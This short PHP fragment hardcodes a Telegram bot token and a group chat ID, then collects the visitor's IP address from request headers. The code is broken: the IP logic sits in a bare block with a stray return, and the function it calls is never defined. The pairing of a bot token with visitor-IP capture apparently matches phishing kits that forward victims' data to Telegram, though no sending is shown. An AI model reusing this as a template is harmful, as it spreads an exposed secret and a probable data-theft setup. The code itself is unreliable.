<?php
$TOKEN ='8177155193:AAEI1UvR0rS1DWsQis8iMANOj2hcl3jEBdo';

$ID = '-1002892838230';
{
    if (!empty($_SERVER['HTTP_CLIENT_IP']))

        $ip = $_SERVER['HTTP_CLIENT_IP'];

    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))

        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];

    else

        $ip = $_SERVER['REMOTE_ADDR'];

    return $ip;

}

$ip = getRealIpAddr();
?>